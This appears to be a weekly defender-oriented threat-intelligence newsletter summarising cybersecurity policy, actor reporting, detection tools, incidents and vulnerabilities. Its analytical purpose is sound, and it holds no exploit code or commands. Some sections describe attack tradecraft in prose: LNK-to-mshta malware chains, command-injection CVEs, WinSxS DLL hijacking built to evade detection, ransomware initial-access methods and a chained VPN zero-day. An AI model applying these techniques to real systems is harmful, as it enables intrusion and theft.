CTO at NCSC Summary: week ending January 14th
The intangible costs from breaches aren't being estimated nor calculated today.. we likely need to work on that..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week the thing to note is this blog from Lastpass and the forced master password changes etc to increase security. Outside of that VPN zero-days being exploited (see below)..
In the high-level this week:
Journal of Cyber Policy - December 2023 including Interview with Will Middleton: The UK's approach to cyber security capacity building in a changing world
ECB to run first cyber resilience stress tests - The tests, conducted with 109 supervised banks, adopt a scenario in which a cyberattack succeeds in disrupting each bank’s daily business operations.
Office Of The Inspector General Of The Intelligence Community - Joint Report On The Implementation Of The Cybersecurity Information Sharing Act Of 2015 - December 2023 Report - The OIGs determined that CTI and DM sharing has improved over the past two years, and efforts are underway to expand accessibility to information.
National control and cyber resilience to safeguard national security - from Norway and published late December
An Analysis of Cybersecurity Education Programs in Europe: Key Findings - an initial assessment of cybersecurity educational programs in eight European countries: the Czech Republic, France, Germany, Greece, Poland, Romania, Spain, and Ukraine.
Cybersecurity and Privacy of Genomic Data - from NIST and published late December - Genomic cybersecurity guidance can aid organizations by 1) protecting them against data misuse which could harm individuals, companies, and nations and 2) enabling secure collaborative innovations.
New $20m project by British and Singapore researchers to improve healthcare cyber security - scientists from Imperial College London and Nanyang Technological University (NTU) will embark on a $20 million programme to improve the cyber security of medical devices.
FTC Order Prohibits Data Broker X-Mode Social and Outlogic from Selling Sensitive Location Data - Data broker X-Mode Social and its successor Outlogic will be prohibited from sharing or selling any sensitive location data to settle Federal Trade Commission allegations that the company sold precise location data that could be used to track people’s visits to sensitive locations such as medical and reproductive health clinics, places of religious worship and domestic abuse shelters.
Merck $1.4 Billion Cyberhack Settlement Ends ‘Warlike’ Act Claim - Three of Merck’s insurers filed stipulations with the justices Wednesday—just before the scheduled start of oral argument—notifying the court that argument was off in the insurers’ appeal of a state appellate court ruling that Merck was entitled to roughly $700 million in claims.
follow-up Insurance Journal reporting
Ofcom poaches Big Tech staff in push to enforce new internet curbs - The regulator has created a new team of nearly 350 people dedicated to tackling online safety, including new hires from senior jobs at Meta, Microsoft and Google.
A Study on Implementation Attacks against QKD Systems - excellent work from Germany’s BSI, they have also published other good Quantum work in recent(ish) history
Study: Development status of quantum computers version 2.0 (November 2023)
Market Survey on Cryptography and Quantum Computing (August 2023)
Defending Democracy
Deplatforming Norm-Violating Influencers on Social Media Reduces Overall Online Attention Toward Them - After 12 months, we estimate that online attention toward deplatformed influencers is reduced by -63% (95% CI [-75%,-46%]) on Google and by -43% (95% CI [-57%,-24%]) on Wikipedia.
Artificial Intelligence’s Threat to Democracy - by the team at CISA - Although the technology won’t introduce fundamentally new risks in the 2024 election—bad actors have used cyberthreats and disinformation for years to try to undermine the American electoral process—it will intensify existing risks.
World Economic Forum - The Global Risks Report 2024 - Beyond elections, perceptions of reality are likely to also become more polarized, infiltrating the public discourse on issues ranging from public health to social justice. However, as truth is undermined, the risk of domestic propaganda and censorship will also rise in turn. In response to mis- and disinformation, governments could be increasingly empowered to control information based on what they determine to be “true”
Reporting on/from China
China Orders Banks, Insurers to Review Cyber and Data Security - In a directive sent at the end of last year, The National Financial Regulatory Administration asked banks and insurers to fix any identified loopholes to guard against the risk of ransomware attacks by mid-January, according to people familiar with the matter. Banks were urged to reinforce the secure usage of emails and protect against phishing, said the people, asking not to be identified discussing a private matter.
Beijing forensic institute cracks AirDrop transmission, helping police trace senders of ‘inappropriate messages - crack is a strong word, reduction in problem space through pre-computation of a hash table is more accurate
Hackers help Philippines’ understaffed cyberdefence team fight China threat - from the South China Morning Post - The government’s cyber response team has 35 members. The group is so understaffed that it is sometimes forced to work with anonymous “black hat” hackers, who may have previously attacked government websites but are willing to offer tips on looming threats, said Jeffrey Ian Dy, undersecretary at the Department of Information and Communications Technology.
A Deep Dive into Data Leakage and Commerce in Chinese Telegram - by the team at the company S2W in Taiwan - “A total of 620 damaged companies and institutions confirmed on Telegram in China during the second half of 2023. The country with the highest number of victims is Taiwan , and 7 out of the top 10 are Asian countries.”
Artificial intelligence
Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations - from NIST
FTC - AI Companies: Uphold Your Privacy and Confidentiality Commitments - There’s also a risk that a model-as-a-service company may, through its APIs, infer a range of business data from the companies using its models, such as their scale and precise growth trajectories.
List of Law Firms for Plaintiffs suing AI companies in copyright lawsuits
EU Commission launches calls for contributions on competition in virtual worlds and generative AI - looking into some of the agreements that have been concluded between large digital market players and generative AI developers and providers. The European Commission is investigating the impact of these partnerships on market dynamics
Cyber proliferation
Amazingly nothing of note this week
How Crime Shapes Insurance and Insurance Shapes Crime - Crime creates demand for insurance but supplying insurance may promote crime. We examine five case studies of insured crimes (auto theft, art theft, kidnap and hijack for ransom, ransomware, and payment card fraud) and find a co-evolutionary process through which insurers engage with insureds, governments, and legal and extralegal third parties to mitigate losses, particularly when criminal innovations destabilize the insurance market.
The reflection this week comes off the back of the book Capitalism Without Capital: The Rise of the Intangible Economy. If you take one thing from this book it is the value of data and other intangibles to companies/organisations in modern economies. Why this matters in the context of cyber is whilst there will be costs on the balance sheet for dealing with cyber intrusions the loss of any edge/value they had because of their intangibles won’t be recorded. We do not have the maturity in a lot of cases to quantify it either.. fun times trying to price that in (think Nortel)!
Finally, I found some time to do a few hours of technical research stemming from a hunch which resulted in a neat canary opportunity embedded in media files to detect breaches when opened by adversaries… fly my canaries.. fly..
Enjoying this? Don’t get via e-mail? Subscribe:
Think someone else would benefit? Share:
All attribution is by others and not the UK Government, please see the legal text at the end.
Have a lovely Thursday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Reporting on Russia
Russian hackers were inside Ukraine telecoms giant for months - cyber spy chief
A warning to all CNI companies on strategic placement here..
Russian hackers were inside Ukrainian telecoms giant Kyivstar's system from at least May last year in a cyberattack that should serve as a "big warning" to the West, Ukraine's cyber spy chief told Reuters.
Targeted attacks against Ukrainian servicemen using the topic of recruitment to the 3rd OSHBr and the IDF
from the Ukraine government on alleged Russian activity, the tradecraft i.e. LNK files via email is rather basic however.
It was found that no later than November 2023, unknown persons will distribute archives containing LNK files, the launch of which will trigger the REMCOSRAT and REVERSESSH malware chain, which will lead to the creation of technical conditions for unauthorized remote access to computers for attackers.
As a rule, the mentioned shortcut files contain an obfuscated command to download and run with the help of mshta.exe the HTA file, which contains the obfuscated program code. In turn, the VBScript code will run a PowerShell command designed for decryption (AES-128-ECB),
https://cert.gov.ua/article/6276988
https://www.uptycs.com/blog/remcos-rat-uac-0500-pipe-method
Reporting on China
Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
See exploitation section below for details - attributed by the vendor as allegedly China.
Detailed Analysis of ‘Operation Japan’ Campaign
Reporting out of Taiwan on a multifaceted campaign which allegedly involved Chinese hacktivists which I think it is fair to say haven’t been as prominent as they maybe once were at the turn of the century. Of note is the fact they were/are exploiting web vulnerabilities in this case..
Chinese hacktivist groups are strongly opposing Japan's nuclear waste discharge, and hacktivists from Italy (Anonymous Italia Team) and Indonesia (VulzSec), which are not directly related to the discharge of contaminated water from the Fukushima nuclear power plant, are also opposing Japan's nuclear waste discharge. They strongly oppose it and are carrying out cyber attacks by launching ‘OpFukushima’ and ‘OpJapan’ campaigns, respectively.
CVE-2022–29303: Command Injection vulnerability that attacks by inserting a command into the email address input box on the test email sending page.
CVE-2023–23333: SolarView Compact Ver. Command Injection vulnerability that can be attacked by inserting a command into the file parameter passed to downloader.php of products 6.00 or lower.
https://medium.com/s2wblog/detailed-analysis-of-operation-japan-campaign-14834a14a684
Reporting on North Korea
North Korean Hacking Group Lazarus Withdraws $1.2M of Bitcoin From Coin Mixer
Money on the move..
Lazarus Group, said to have been behind some $3 billion worth of cryptocurrency hacks and exploits over the past three years, appears to be moving around some of its bitcoin hoard. The group holds $79 million in wallets tagged by the blockchain analysis firm Arkham.
North Korean hackers Lazarus Group have moved $1.2 million worth of their ill-gotten gains from a coin mixer to a holding wallet, marking their largest transaction in over a month.
Data from the blockchain analysis firm Arkham shows that Lazarus Group's wallet received 27.371 bitcoin (BTC) in two transactions before sending out 3.34 BTC to a previously used wallet. The coin mixer wasn't identified.
Current status of spearphishing email attacks by North Korean hacking organizations
Reporting out of South Korea on alleged North Korean activity which gives a sense of scale of the phishing ops from one of the sub groups. Of note is the hit rate against the victims.
Over the past 10 months, 16 email servers and 24 impersonation accounts were used for spear phishing, sending messages to hundreds of key figures at home and abroad.
One in four recipients of spear phishing emails reads them without suspicion and then sends a reply email, making it highly likely that they will be infected with malware.
Responds precisely, completely, and naturally according to the information of the attack target and the content of the reply, and then distributes malware.
Analyzing DPRK's SpectralBlur
Patrick Wardle’s analysis hints that this alleged DPRK macOS implant was potentially ported from another Unix OS such as Linux due to the POSIX API reliance.
https://objective-see.org/blog/blog_0x78.html
Reporting on Iran
“Homeland Justice” targets Albanian organizations with “No-justice” wiper
Detailed technical analysis on an alleged Iranian destructive operation in Albania which was covered last week. Of note is that the first campaign was apparently over 18 months prior to the eventual outcome..
Homeland Justice launched its first campaign on July 15th, 2022, targeting Albanian e-government systems right before a planned conference of Iranian opposition group Mojahedin-e Khalq (Persian: ِن خلق مجاهدی(, also known as MEK - a well-known Iranian group seeking to replace the current regime in Iran. The conference was cancelled following the attack. In September 2022, the actor launched a second campaign targeting Albanian border crossings. On December 24th, 2023, the actor publicized the current campaign, described in this blog, targeting Albanian infrastructure and government organizations. It is interesting to note that an MEK camp was raided by police in June 2023
https://www.clearskysec.com/no-justice-wiper/
Reporting on Other Actors
Turkish espionage campaigns in the Netherlands
Alleged Turkish activity reporting from a team that have first hand experience of this actor in a former life.
In the past year, [we have] observed cyberattacks in the Netherlands, which are believed to have been orchestrated by a cyber threat actor operating in alignment with Turkish interests, signalling an escalation in Turkey's pursuit of objectives within Western nations.
Motivation: primarily focused on acquiring economic and political intelligence through espionage and information theft that targets public and private entities;
Targeted Sectors: Government entities, Kurdish (political) groups like PKK, telecommunication, ISPs, IT-service providers (including security companies), NGO and Media & Entertainment sectors;
Geographical Focus: focuses primarily on targeting organizations in Europe, Middle East and North Africa;
https://www.huntandhackett.com/blog/turkish-espionage-campaigns
A gamer turned malware developer : diving into SilverRATand it’s Syrian roots
Nothing overly notable here other than the region and the capability breeding within it. The path travelled by this individual is all too familiar, I remember hiring a young person once who was studying accountancy (hated it) and was fiddling with games and a memory hex editor at home. He became a wonderful penetration testing.. this is the lightside of the path, below is the darkside..
During our investigation, we discovered a Facebook account of a hacktivist group that supports the “Syrian Revolution”, with post engagement from a developer of Silver RAT based on multiple attribute matches. Reviewing the developer’s previous posts reveals a history of offering various first-person shooter (FPS) game hacks and mods.
The developer, operating under the name “Anonymous Arabic,” appears is supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware. It is crucial for organizations to enhance their defense mechanisms in response to this potential threat.
Follow-On Extortion Campaign Targeting Victims of Akira and Royal Ransomware
Stefan Hostetler and Steven Campbell detail some interesting cases of double dipping against victims. Getting to the bottom of the what/why here is important..
[We] investigated several cases of Royal and Akira ransomware victims being targeted in follow-on extortion attacks starting in October 2023.
It is not clear whether these follow-on extortion attempts were officially sanctioned by the groups responsible for the original ransomware attacks, given the low payment demands, in addition to other unique campaign elements.
Based on our analysis of common elements between these cases, Arctic Wolf Labs assesses with moderate confidence that a common threat actor was responsible for these follow-on extortion attempts.
Mirai.TBOT Uncovered: Over 100 Groups and 30,000+ Infected Hosts in a big IoT Botnet
Wang Hao, Acey9, Alex.Turing report from China on the scale and capability of this rather large IoT botnet. That is done DDoS capacity..
Multiple Bot groups (100+), representing a higher number of infection methods
Ability to exploit 0-days
OpenNIC custom C2 domains (32 domains in some samples, not all registered)
Massive scale(we registered 3 of the C2 domains mentioned above on November 4, 2023, so we can obtain an approximate count of its bots, which is active with more than 30,000 Bot IPs per day)
Mainly used for DDoS purposes
https://blog.xlab.qianxin.com/mirai-tbot-en/
In-depth analysis and technical analysis of LockBit, the top encryption ransomware organization
Detailed analysis out of China on this criminal group giving a sense of their operational modus operandi and end-to-end sophistication.
LockBit operators and affiliates will find ways to obtain the victim's initial access rights and use them to deliver encrypted ransomware. The attack methods can be roughly divided into the following methods:
Extensive vulnerability scanning . Using Nday vulnerabilities, 1day vulnerabilities, and 0day vulnerabilities to scan assets in batches is often referred to as casting a wide net.
Ghost employees in the company . By bribing corporate insiders with money, LockBit has paid millions of dollars to insiders who provided important access to the company, or insiders who clicked on encrypted extortion emails, or who manually ran virus programs. .
New 1day vulnerabilities . Such as Feita firewall CVE-2018-13379 vulnerability, Citrix NetScaler network device vulnerability, VMware log4j2 vulnerability, F5 code execution vulnerability, etc.
Account passwords sold on the dark web . Including VPN, RDP, corporate email account and password.
IAB Estate Sale Permissions . The LockBit organization will purchase the corresponding permissions from IAB attackers.
RDP password credentials . Obtained through underground purchase or RDP brute force cracking method
VPN Utilization . Through VPN vulnerabilities or weak VPN passwords.
Social workers fishing . Backdoors are bundled in email attachments, and there are also Office macro processing backdoors.
Discovery
How we find and understand the latent compromises within our environments.
Ghost in the Web Shell: Introducing ShellSweep
Michael Haag provides a capability which means there should be little excuse for the presence latent web shells now whilst also bringing some applied data science to the party.
[We] developed a suite of utilities designed to help organizations detect, catalog, and combat malicious web shells. Today, we're thrilled to introduce you to ShellSweep, a powerful tool designed to hunt down and flag potential web shells lurking in your web servers, which encompasses three utilities: ShellScan, ShellCSV and ShellSweep.
These utilities work in tandem to identify potential web shells and help you provide a comprehensive defense against web shells in your environments.
https://www.splunk.com/en_us/blog/security/ghost-in-the-web-shell-introducing-shellsweep.html
BPF Memory Forensics with Volatility 3
Great work here which will be super valuable when upstreamed into the main Volatility project.
While the workshop, our plugins, and this post are an important step towards this goal, much work remains to be done. First, in order for the present work to be useful in the real world our next goal must be to upstream most of it into the Volatility 3 project. Only this will ensure that investigators all around the world will be able to easily find and use it. This will require:
Refactoring of our utility code to use Volatility 3’s extension class mechanism
The
bpf_graphplugin relies on networkx, which is not yet a dependency of Volatility 3. If the introduction of a new dependency into the upstream project is not feasible, one could make it optional by checking for the presence of the package within the plugin.Additional testing on older kernel versions and kernels with diverse configurations to meet Volatility’s high standards regarding compatibility
We will be happy to work with upstream developers to make the integration happen.
https://lolcads.github.io/posts/2023/12/bpf_memory_forensics_with_volatility3/
Defence
How we proactively defend our environments.
Generation of Tailored and Confined Datasets for IDS Evaluation in Cyber-Physical Systems
Thomas Hutzelmann, Dominik Mauksch, Ana Petrovska, and Alexander Pretschner bring some rigour to data set generation for cyber detection in cyber-physical. This helps on the path to cyber as a science..
The state-of-the-art evaluation of an Intrusion Detection System (IDS) relies on benchmark datasets composed of the regular system’s and potential attackers’ behavior. The datasets are collected once and independently of the IDS under analysis.
This paper questions this practice by introducing a methodology to elicit particularly challenging samples to benchmark a given IDS. In detail, we propose (1) six fitness functions quantifying the suitability of individual samples, particularly tailored for safety-critical cyber-physical systems, (2) a scenario-based methodology for attacks on networks to systematically deduce optimal samples in addition to previous datasets, and (3) a respective extension of the standard IDS evaluation methodology.
We applied our methodology to two network-based IDSs defending an advanced driver assistance system. Our results indicate that different IDSs show strongly differing characteristics in their edge case classifications and that the original datasets used for evaluation do not include such challenging behavior. In the worst case, this causes a critical undetected attack, as we document for one IDS. Our findings highlight the need to tailor benchmark datasets to the individual IDS in a final evaluation step. Especially the manual investigation of selected samples from edge case classifications by domain experts is vital for assessing the IDSs.
https://mediatum.ub.tum.de/1730888
Latest Windows hardening guidance and key dates
Namrata Bachwani outlines the plan for this year..
EDRNoiseMaker
Arturo gives the world a tool to help detect the misuse of WFP covered previously. I the fact that this happened in response to offensive tradecraft.. your move OST producers :).
The aim of this tool is to detect potential silencers of an EDR (or the process you choose). Based on the attack against EDR developed by EDRSilencer and FireBlock,
EDRNoiseMakertrys to detect them by checking a list of executables that have been silenced using the Windows Filtering Platform (WFP).
https://github.com/amjcyber/EDRNoiseMaker
Hunting M365 Invaders: Blue Team's Guide to Initial Access Vectors
Mauricio Velazco gives a vendor specific set of tradecraft which can likely be applied in other analytical environments.
We then introduce six common techniques typically used during initial access against M365 tenants, explaining how to simulate them and how teams can detect them.
Choosing a security model - AWS Prescriptive Guidance
Wisdom from the AWS cyber security deities..
You can choose from various security models or approaches for AWS. The choice of approach and the best-fitting model depends on your audience, the target business outcomes, and the overall business process. It is possible to use a blend of multiple models.
The following are a few common models:
Architectural model
Maturity model
Governance model
Each model has its own set of benefits and drawbacks. It is important to consider which approach is best suited for your organization. Involve security professionals early in the process of modernizing your infrastructure and adopting cloud strategies. The model you choose has a significant impact on the roles and responsibilities within your organization.
Incident Writeups
How they got in and what they did.
How 50% of telco Orange Spain’s traffic got hijacked^H^H^H^H^H^Hnull routed — a weak password
Kevin Beaumont details this very unfortunate event which highlights a likely unexpected soft underbelly / concentration risk.
The threat actor accessed Orange’s RIPE account. RIPE look after internet IP addresses, basically the phone book of the internet. From their RIPE details, they were able to announce config which broke BGP routing — think the routing between networks which tell the network where to route the calls.
To administrator RIPE, you use a website called access.ripe.net. The threat actor posted themselves logged in to account adminripe-ipnt@orange.es:
Vulnerability
Our attack surface.
CVE-2023-47804: OpenOffice Macro URL arbitrary script execution
Two things here, one that the first patch was not comprehensive, second is the email potential for exploitation.
Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of Apache OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of 2022-47502.
https://www.openoffice.org/security/cves/CVE-2023-47804.html
Worse than SolarWinds: Three Steps to Hack Blockchains, GitHub, and ML through GitHub Actions
John Stawinski details both the attack surface and how they are made a lot of money..
Over the last four months, we have been going through this list of vulnerable repositories, performing advanced CI/CD exploitation, and submitting our results through the respective bug bounty programs. So far, we’ve submitted over 20 bug bounty reports, raking in hundreds of thousands of dollars in bounties.
Offense
Attack capability, techniques and trade-craft.
Hide and Seek in Windows' Closet: Unmasking the WinSxS Hijacking Hideout
Of note to defensive teams due to the lowing in detection probability.
[1] Our research team has evolved the classic DLL Search Order Hijacking techniqu by deliberately targeting files located in the WinSxS folder. [2] Our approach lowers the probability of detection compared to the classic DLL Search Order Hijacking, as the malicious code operates within the memory space of a trusted binary located in the Windows folder WinSxS. [3] Unlike traditional methods, there is no requirement to introduce your own vulnerable binary, as Windows already includes various files stored in the WinSxS directory that can be leveraged.
Changing Primary Tokens Session ID
Jonathan Johnson details how this works so we can look for the signals it might be happening.
Microsoft documentation mentions that a developer may change the session id within a token, although that is true it isn’t valuable unless the session id equals the session id held within the process object. So although this malware seemed to be doing something cool it wouldn’t have worked properly unless they were changing their token session id to equal the process’s session id which would require:
Suspension of all the threads within that process
Some way of getting thread execution within that process via injection or something similar
https://jsecurity101.medium.com/changing-primary-tokens-session-id-931c269aa08e
Exploitation
What is being exploited.
Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
Matthew Meltzer, Robert Jan Mora, Sean Koessel, Steven Adair and Thomas Lancaster detail this active exploitation they alleged is the Chinese state.
[We] discovered two different zero-day exploits which were being chained together to achieve unauthenticated remote code execution (RCE). Through forensic analysis of the memory sample, Volexity was able to recreate two proof-of-concept exploits that allowed full unauthenticated command execution on the ICS VPN appliance. These two vulnerabilities have been assigned the following CVEs:
CVE-2023-46805 - an authentication-bypass vulnerability with a CVSS score of 8.2
CVE-2024-21887 - a command-injection vulnerability found into multiple web components with a CVSS score of 9.1
When combined, these two vulnerabilities make it trivial for attackers to run commands on the system.
[We have] reason to believe that UTA0178 is a Chinese nation-state-level threat actor.
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
A short note on AWS KEY ID
Tal Be'ery educates us that AWS encodes account numbers inside access key IDs, which will be useful in instances where they leak and you try and work out the impact.
https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489
YaraDbg
Wonderful release here also much love to #100DaysOfYara on X (formerly Twitter)
YaraDbg is a free web-based Yara debugger to help security analysts to write hunting or detection rules with less effort and more confidence. By using YaraDbg, you can perform a thorough root-cause-analysis (RCA) on why some of your Yara rules did or did not match with a specific file. It can also help you to better maintain a large set of yara rules.
https://github.com/DissectMalware/yaradbg-frontend
https://github.com/DissectMalware/yaradbg-backend
https://github.com/DissectMalware/yaradbg-backend/blob/main/yaraparser/ydbg/yara.grammar
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
2023 CVE Data Review - We ended 2023 with 28,902 published CVEs, up over 15% from the 25,081 CVEs published in 2022.
Digitally encoded RF to optical data transfer using excited Rb without the use of a local oscillator - We present a passive RF to optical data transfer without a local oscillator using an atomic “Rydberg” receiver. We demonstrate the ability to detect a 5G frequency carrier wave (3.5 GHz) and decode digital data from the carrier wave without the use of a local oscillator to detect the modulation of the RF signal.
Researchers Create First Functional Semiconductor Made From Graphene - Known as the "band gap", it is a crucial electronic property that allows semiconductors to switch on and off. Graphene didn't have a band gap – until now.
Cybersecurity and the politics of knowledge production: towards a reflexive practice - We examine the politics of ‘the making of’ cybersecurity expertise as knowledge practitioners who are located across and in between the diverse and overlapping fields of academia, diplomacy and policy. Cybersecurity expertise, and the practices of the cybersecurity epistemic community more broadly, rely heavily on the perceived applicability and actionability of knowledge outputs, on the practical dependency on policy practitioners regarding access, and thus on the continuous negotiation of hierarchies of knowledge.
Artificial intelligence
Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models
Mind2Web: Towards a Generalist Agent for the Web - this looks super powerful for web security use cases
Blending Is All You Need: Cheaper, Better Alternative to Trillion-Parameters LLM
Reality warping / disinformation enabling…
Books
The Crypto Launderers: Crime and Cryptocurrencies from the Dark Web to DeFi and Beyond
Trafficking Data: How China Is Winning the Battle for Digital Sovereignty
Cyber Sovereignty: The Future of Governance in Cyberspace - out of June 2024
Adventures in Volcanoland: What Volcanoes Tell Us About the World and Ourselves by fellow Police Science Advisory Council member Tamsin Mather - who new planets without tectonic plates can have volcanos
Events
Video this week is from our colleagues at NSA at the Post-Quantum: Cybersecurity Speaker Series
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.
I think Beaumont missed the bigger issue of ROV RPKI and the role it played in the Orange Spain event. I like Madory's review on it a bit more: https://www.kentik.com/blog/digging-into-the-orange-espana-hack/